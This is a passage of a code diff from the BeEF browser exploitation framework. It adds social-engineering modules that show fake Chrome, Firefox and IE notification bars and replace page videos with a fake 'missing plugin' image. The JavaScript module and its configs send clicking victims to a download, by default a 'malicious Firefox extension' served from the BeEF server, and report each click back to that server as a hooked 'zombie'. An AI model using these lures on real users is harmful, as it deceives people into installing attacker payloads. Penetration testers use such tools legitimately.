+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/indexFF.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/key_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/lpwhite_small.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/q3Jrp.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/screenkeyboard.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/xsmall.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/create_small.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/icon.png') 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/lp/jquery.js') 
+    end
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_c/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_c:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Chrome)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Chrome. If the user clicks the notification they will be prompted to download the file specified below."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_c/module.rb

@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_c < BeEF::Core::Command
+
+  def self.options
+    return [
+      {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe', 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "Additional plugins are required to display all the media on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_ff/command.js

@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+	var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aHaAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'});
+	var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
+	$j(hid).append(ell);
+	//$j(hid).append("<u>Problems installing?</u>&nbsp;");
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		window.location = '<%= @url %>';
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});

modules/social_engineering/fake_notification_ff/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_ff:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Firefox)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_ff/module.rb

@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+    return [
+      {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "An additional plug-in is required to display some elements on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_ie/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_ie:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (IE)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_ie/module.rb

@@ -3,13 +3,13 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-class Fake_notification < BeEF::Core::Command
+class Fake_notification_ie < BeEF::Core::Command
 
   def self.options
     return [
       { 'name' => 'notification_text',
         'description' => 'Text displayed in the notification bar',
-        'ui_label' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
         'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
       }
     ]

modules/social_engineering/replace_video_fake_plugin/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        replace_video_fake_plugin:
+            enable: true
+            category: ["Social Engineering"]
+            name: "Replace Videos (Fake Plugin)"
+            description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/replace_video_fake_plugin/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Replace_video_fake_plugin < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port")
+    return [
+        {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
+        {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end